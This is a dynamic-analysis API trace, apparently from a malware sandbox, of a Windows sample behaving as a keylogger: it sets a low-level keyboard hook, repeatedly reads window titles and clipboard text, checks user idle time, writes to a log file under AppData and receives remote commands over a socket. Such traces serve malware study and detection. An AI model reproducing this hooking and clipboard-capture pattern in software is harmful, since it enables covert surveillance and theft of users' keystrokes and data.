[0230.911] malloc (_Size=0x3e8) returned 0x2207db8
[0230.911] recv (in: s=0x1e0, buf=0x2207db8, len=1000, flags=0 | out: buf=0x2207db8*) returned 32
[0240.609] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fb00
[0240.609] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb10
[0240.609] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.609] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb20
[0240.610] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fac8
[0240.610] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0240.610] ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0240.610] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22081a9
[0240.610] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fa58
[0240.610] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22084c9
[0240.610] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fab8
[0240.610] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.610] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0240.610] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.610] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22084c9
[0240.610] strncmp (_Str1="[DataStart]", _Str2="[DataStart]", _MaxCount=0xb) returned 0
[0240.610] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x20
[0240.610] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0240.610] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19faa8
[0240.610] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0240.610] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.610] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fa98
[0240.610] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fac8
[0240.610] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.610] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415a48
[0240.610] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a8
[0240.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a71e, lpParameter=0x415a30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0
[0240.611] WaitForSingleObject (hHandle=0x2a8, dwMilliseconds=0xffffffff) returned 0x0
[0240.620] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fa88
[0240.620] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fb20
[0240.620] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.620] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x0
[0240.620] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0240.621] free (_Block=0x2207db8)
[0240.621] malloc (_Size=0x3e8) returned 0x2207db8
[0240.621] recv (s=0x1e0, buf=0x2207db8, len=1000, flags=0)
Thread:
id = 98
os_tid = 0x106c
Thread:
id = 99
os_tid = 0xde0
Thread:
id = 100
os_tid = 0x10b8
[0228.516] Sleep (dwMilliseconds=0x2710)
[0238.532] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0238.532] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202e09
[0238.532] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\vbmcdsb\\logs.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\vbmcdsb\\logs.dat")) returned 0xffffffff
[0238.534] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202e09
[0238.534] SetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\vbmcdsb\\logs.dat", dwFileAttributes=0x80) returned 0
[0238.535] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2205f09
[0238.535] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202e09
[0238.535] ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z () returned 0x210fd80
[0238.538] ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ () returned 0x1
[0238.539] ??$?6DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$c () returned 0x210fd80
[0238.540] ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ () returned 0x210fd84
[0238.547] ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ () returned 0x0
[0238.547] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z () returned 0x4156c4
[0238.547] ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x22061d9
[0238.547] Sleep (dwMilliseconds=0x2710)
Thread:
id = 101
os_tid = 0x10b4
[0228.517] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0228.517] SetWindowsHookExA (idHook=13, lpfn=0x40385c, hmod=0x400000, dwThreadId=0x0) returned 0x402cd
[0228.517] GetMessageA (lpMsg=0x230ff5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0)
[0243.675] GetKeyState (nVirtKey=20) returned 0
[0243.675] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x230fdc8
[0243.675] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0243.675] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.675] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x100, lParam=0x230ff04) returned 0x0
[0243.677] GetKeyState (nVirtKey=20) returned 0
[0243.677] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x230fdc8
[0243.677] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0243.677] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0243.677] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x100, lParam=0x230ff04) returned 0x0
[0243.679] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x101, lParam=0x230ff04) returned 0x0
[0243.686] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x101, lParam=0x230ff04) returned 0x0
[0244.129] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x104, lParam=0x230ff04) returned 0x0
[0244.159] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x104, lParam=0x230ff04) returned 0x0
[0244.160] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x105, lParam=0x230ff04) returned 0x0
[0244.161] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x101, lParam=0x230ff04) returned 0x0
[0244.981] GetKeyState (nVirtKey=20) returned 0
[0244.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x230fe00
[0244.981] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0244.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0244.981] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x100, lParam=0x230ff04) returned 0x0
[0244.982] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x101, lParam=0x230ff04) returned 0x0
[0244.983] GetKeyState (nVirtKey=20) returned 0
[0244.983] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x230fe00
[0244.983] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0244.983] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0244.983] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x100, lParam=0x230ff04) returned 0x0
[0244.984] CallNextHookEx (hhk=0x402cd, nCode=0, wParam=0x101, lParam=0x230ff04) returned 0x0
Thread:
id = 102
os_tid = 0x10a0
[0228.520] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415748
[0228.520] _onexit (_Func=0x404254) returned 0x404254
[0228.520] Sleep (dwMilliseconds=0x1f4)
[0229.053] GetForegroundWindow () returned 0x103ca
[0229.053] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0229.054] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0229.054] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0229.054] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206fc9
[0229.054] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206fc9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0229.054] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0229.054] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0229.055] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0229.055] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0229.055] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0229.055] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0229.055] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0229.055] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.055] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.055] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4156a8
[0229.055] _onexit (_Func=0x405201) returned 0x405201
[0229.055] OpenClipboard (hWndNewOwner=0x0) returned 1
[0229.055] GetClipboardData (uFormat=0x1) returned 0x5433b0
[0229.059] CloseClipboard () returned 1
[0229.059] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0229.059] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0229.060] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156a8
[0229.060] ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z () returned 0x1
[0229.060] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240fee8
[0229.060] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240fec8
[0229.060] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0229.060] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.060] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.060] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.060] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0229.060] GetTickCount () returned 0x1d48633
[0229.060] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.060] Sleep (dwMilliseconds=0x1f4)
[0229.776] GetForegroundWindow () returned 0x103ca
[0229.776] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0229.776] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0229.776] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0229.776] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0229.776] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0229.776] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0229.776] OpenClipboard (hWndNewOwner=0x0) returned 1
[0229.777] GetClipboardData (uFormat=0x1) returned 0x5434a0
[0229.777] CloseClipboard () returned 1
[0229.777] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0229.777] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0229.777] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.777] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0229.777] GetTickCount () returned 0x1d48901
[0229.777] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0229.777] Sleep (dwMilliseconds=0x1f4)
[0230.293] GetForegroundWindow () returned 0x103ca
[0230.293] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0230.294] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0230.294] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0230.294] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f69
[0230.294] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f69, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0230.294] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0230.295] OpenClipboard (hWndNewOwner=0x0) returned 1
[0230.295] GetClipboardData (uFormat=0x1) returned 0x543650
[0230.295] CloseClipboard () returned 1
[0230.295] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0230.295] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0230.295] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.296] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0230.296] GetTickCount () returned 0x1d48b05
[0230.296] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.296] Sleep (dwMilliseconds=0x1f4)
[0230.808] GetForegroundWindow () returned 0x103ca
[0230.808] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0230.808] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0230.808] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0230.808] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f99
[0230.808] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f99, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0230.808] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0230.808] OpenClipboard (hWndNewOwner=0x0) returned 1
[0230.809] GetClipboardData (uFormat=0x1) returned 0x543590
[0230.809] CloseClipboard () returned 1
[0230.809] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0230.809] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0230.809] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.809] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0230.809] GetTickCount () returned 0x1d48d09
[0230.809] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0230.809] Sleep (dwMilliseconds=0x1f4)
[0231.322] GetForegroundWindow () returned 0x100e4
[0231.322] GetWindowTextLengthA (hWnd=0x100e4) returned 10
[0231.322] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0231.322] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0231.322] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206de9
[0231.323] GetWindowTextA (in: hWnd=0x100e4, lpString=0x2206de9, nMaxCount=11 | out: lpString="FolderView") returned 10
[0231.323] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0231.323] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0231.323] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xb
[0231.323] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0231.323] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0231.323] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0231.325] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0231.325] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.325] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.325] OpenClipboard (hWndNewOwner=0x0) returned 1
[0231.327] GetClipboardData (uFormat=0x1) returned 0x543530
[0231.328] CloseClipboard () returned 1
[0231.328] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0231.328] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0231.328] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.328] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0231.328] GetTickCount () returned 0x1d48f0c
[0231.328] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.328] Sleep (dwMilliseconds=0x1f4)
[0231.829] GetForegroundWindow () returned 0x103ca
[0231.829] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0231.830] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0231.830] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0231.830] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206d89
[0231.830] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206d89, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0231.830] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x0
[0231.830] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415748
[0231.830] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0231.830] ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z () returned 0x240ff50
[0231.830] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z () returned 0x240ff40
[0231.830] ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z () returned 0x240ff00
[0231.830] ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x4156c4
[0231.830] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.830] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.830] OpenClipboard (hWndNewOwner=0x0) returned 1
[0231.831] GetClipboardData (uFormat=0x1) returned 0x543440
[0231.831] CloseClipboard () returned 1
[0231.831] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0231.831] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0231.831] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.831] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0231.831] GetTickCount () returned 0x1d49110
[0231.831] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0231.831] Sleep (dwMilliseconds=0x1f4)
[0232.343] GetForegroundWindow () returned 0x103ca
[0232.343] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0232.344] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0232.344] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0232.344] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206f69
[0232.344] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206f69, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0232.344] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0232.344] OpenClipboard (hWndNewOwner=0x0) returned 1
[0232.344] GetClipboardData (uFormat=0x1) returned 0x5434d0
[0232.344] CloseClipboard () returned 1
[0232.344] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x240fef8
[0232.344] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0232.344] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0232.345] GetLastInputInfo (in: plii=0x240ff04 | out: plii=0x240ff04*(cbSize=0x8, dwTime=0x1d477fa)) returned 1
[0232.345] GetTickCount () returned 0x1d49314
[0232.345] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0232.345] Sleep (dwMilliseconds=0x1f4)
[0232.861] GetForegroundWindow () returned 0x103ca
[0232.861] GetWindowTextLengthA (hWnd=0x103ca) returned 12
[0232.861] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z () returned 0x240ff50
[0232.861] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xd
[0232.861] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2206de9
[0232.861] GetWindowTextA (in: hWnd=0x103ca, lpString=0x2206de9, nMaxCount=13 | out: lpString="Nothing Left") returned 12
[0232.861] ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z () returned 0x1
[0232.861] OpenClipboard (hWndNewOwner=0x0) returned 1
[0232.862] GetClipboardData (uFormat=0x1) returned 0x543680
[0232.862] CloseClipboard () returned 1
